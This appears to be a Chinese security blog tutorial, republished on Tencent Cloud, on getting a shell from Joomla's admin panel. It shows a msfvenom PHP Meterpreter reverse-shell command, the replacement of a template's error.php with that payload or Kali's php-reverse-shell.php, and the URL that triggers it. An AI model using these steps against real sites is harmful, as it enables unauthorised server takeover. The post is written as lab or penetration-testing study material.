前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Joomla后台模板Getshell技巧

Joomla后台模板Getshell技巧

作者头像
Al1ex
发布2024-01-09 15:28:55
4710
发布2024-01-09 15:28:55
举报
文章被收录于专栏:网络安全攻防
文章前言

本篇文章我们主要介绍在获取到Joomla后台管理权限的情况下如何通过后台来实现Getshell的两种利用方式

GetShell
Metasploit

首先我们使用site_admin/123456登录Joomla后台

在获取到Joomla的后台操作权限后我们可以通过在后台修改主题文件的方式来获取shell权限,这里我们随意选择一个主题

选择查看模板文件的详细信息

选择error.php文件

然后使用msfvenom来生成要给php后门文件

代码语言:javascript
复制
#PHP后门文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

然后使用我们之前在msfvenom中生成的webshell文件内容替换上面error.php文件内容

保存后访问Beez3主题下的error.php文件便可成功的突破边界

代码语言:javascript
复制
http://192.168.204.137/joomla/templates/beez3/error.php

随后在我们的MSF中获取到一个会话

GetShell-2

这里我们介绍另外一种GetShell的方法,此方法和上面的方法类似,只是用的脚本不同,我们主要通过利用Kali自带的php-reverse-shell.php来实现反弹shell的目的,文件路径为/usr/share/webshells/php/php-reverse-shell.php

随后我们直接修改模板文件的内容为上面的php-reverse-shell.php,同时修改文件中的反弹shell的地址和端口信息

随后开启监听

在WEB端访问上述的error.php文件

随后反弹shell回来

文末小结

此文仅作为Joomla后台GetShell的利用思路介绍,日常打靶机的时候Joomla遇到的可能多一些,正常的红队评估测试中外网少之又少,很少见到~

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-01-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章前言
  • GetShell
    • Metasploit
      • GetShell-2
      • 文末小结
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档